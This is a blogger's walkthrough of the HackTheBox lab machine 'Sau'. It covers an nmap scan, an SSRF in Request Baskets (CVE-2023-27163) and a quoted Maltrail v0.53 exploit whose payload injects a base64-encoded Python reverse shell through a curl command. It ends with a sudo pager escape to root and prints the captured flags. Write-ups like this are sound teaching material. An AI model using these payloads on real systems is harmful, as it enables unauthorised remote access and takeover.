Skip to main content

HTB - Sau

· 7 min read
Strider

Intro

Hi, after some time, I write again a small WriteUp. Today it's about the CTF "Sau". This CTF-Challenge can be found at the platform HackTheBox. You have to find 2 flags in this challenge.

Discovery

The first thing what I do is to fire up Kali Linux and run an nmap scan on that host.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-03 09:38 CET
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:38
Completed NSE at 09:38, 0.00s elapsed
Initiating NSE at 09:38
Completed NSE at 09:38, 0.00s elapsed
Initiating NSE at 09:38
Completed NSE at 09:38, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:38
Completed Parallel DNS resolution of 1 host. at 09:38, 0.04s elapsed
Initiating SYN Stealth Scan at 09:38
Scanning 10.129.229.26 [65535 ports]
Discovered open port 22/tcp on 10.129.229.26
Discovered open port 55555/tcp on 10.129.229.26
Completed SYN Stealth Scan at 09:38, 30.49s elapsed (65535 total ports)
Initiating Service scan at 09:38
Scanning 2 services on 10.129.229.26
Completed Service scan at 09:40, 87.56s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.129.229.26
Retrying OS detection (try #2) against 10.129.229.26
Retrying OS detection (try #3) against 10.129.229.26
Retrying OS detection (try #4) against 10.129.229.26
Retrying OS detection (try #5) against 10.129.229.26
Initiating Traceroute at 09:40
Completed Traceroute at 09:40, 0.04s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:40
Completed Parallel DNS resolution of 2 hosts. at 09:40, 0.06s elapsed
NSE: Script scanning 10.129.229.26.
Initiating NSE at 09:40
Completed NSE at 09:40, 1.16s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 1.06s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.01s elapsed
Nmap scan report for 10.129.229.26
Host is up (0.032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open SSH OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| SSH-hostkey:
| 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 03 Nov 2023 08:38:47 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Fri, 03 Nov 2023 08:38:21 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Fri, 03 Nov 2023 08:38:21 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94%I=7%D=11/3%Time=6544B1A2%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;\
SF:x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Fri,\x2003\x20Nov\x20
SF:2023\x2008:38:21\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"/w
SF:eb\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Re
SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
SF:20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x202
SF:00\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Fri,\x2003\x20Nov\x20
SF:2023\x2008:38:21\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest
SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
SF:)%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC
SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,"
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(K
SF:erberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
SF:equest")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Fri,\x2003\x20Nov\x202023\x2008:38:47\x20GMT\r
SF:\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20nam
SF:e\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$\
SF:n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=11/3%OT=22%CT=1%CU=35760%PV=Y%DS=2%DC=T%G=Y%TM=6544B20
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11
OS:NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 29.633 days (since Wed Oct 4 19:29:17 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 33.92 ms 10.10.14.1
2 34.38 ms 10.129.229.26

NSE: Script Post-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.77 seconds
Raw packets sent: 66184 (2.916MB) | Rcvd: 65648 (2.630MB)

Nmap discovers 4 ports. The first port is 22 that is the service SSH, which we come back later. The second port is port 80 which runs an http service on it maybe, because that port is filtered. On port 8338 also runs a services and that port is also filtered. The last port which sounds interesting is port 55555.

Initial access

The first thing what I could do, is just visit the service with Firefox and BurpSuite.

dia1.png

Well, an application called request baskets. After some search I know what this application does, it for collecting arbitrary HTTP requests. You could also inspect them via REST-API or just an simple WebUI. Link to the repo https://github.com/darklynx/request-baskets

I also found out that the running version 1.2.1 of this application is vulnerable to SSRF.

There some PoC for that CVE - CVE-2023-27163 https://notes.sjtu.edu.cn/s/MUUhEymt7#

Basic PoC for CVE-2023-27163

POST /api/baskets/<basketname> HTTP/1.1

Body
{"forward_url": "http://host:port/","proxy_response": true, "insecure_tls": false,"expand_path": true,"capacity": 250}

I crafted an request which forwards the reuqests to th filtered port 80 on that machine. May I get something back from this service.

dia2.png

Well, the malicious basket was created successfully, and now I have to visit that basket url.

dia2b.png

Viola, on that port runs MailTrail version v0.53. After some research I found out this version has an OS command injection vulnerability, which sound very good for initial access.

The exploit I used can be found (here)[https://github.com/spookier/Maltrail-v0.53-Exploit]

It basically crafts an reverse shell for the username field which is vulnerable because of the use of the function subprocess.check_output() which logs the username provided by the user.

...
payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64
command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
os.system(command)
...

Ok, let's run this exploit against this service and get initial access.

python3 exploit.py 10.10.14.29 4444 http://10.129.229.26:55555/opnhkm7

dia3.png

Ok, I got access to the machine. I'm currently in the application directory of MailTrail and the first thing what I've done was to read the mailtrail.conf

USERS
admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0: # changeme!
# local:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:1000:192.168.0.0/16 # changeme!

# Mask custom

Ok, it looks like some default credentials, which I may use later.

First flag

The next thing what I've done was to run bash -i to get the bash shell. Then I ran id to check which user I am currently. Currently I'm the user puma which is a real user and therfore, I can read the first flag.

user.txt: 2a9e704183baf980bdd27bdb2cea9a80

dia4.png

Time to get a better shell. I created a new SSH key and uploaded the public key to the machine and logged in via SSH and the key.

dia5.png

I forwarded port 80 via SSH to my local machine to check what going on there, may some information which I can use for privilege escalation? I logged in with default credentials.

dia6.png

Unfortunately, there was nothing.

Getting root

By running sudo -l, I found an entry which allows me to run it as root.

dia7.png

By running this command I only can read the status of the trail service or can I do more? Well, the status is shown with editors like vi or vim or maybe less. Which all can run commands to get a shell. In this case I just have to run !sh and I'm root.

dia8.png

As root user I can read out the root flag which completes the challenge.

root.txt: b0838fe875f4d626bb7e8a281c2b9e67

I hope you enjoyed it and see you next time 😄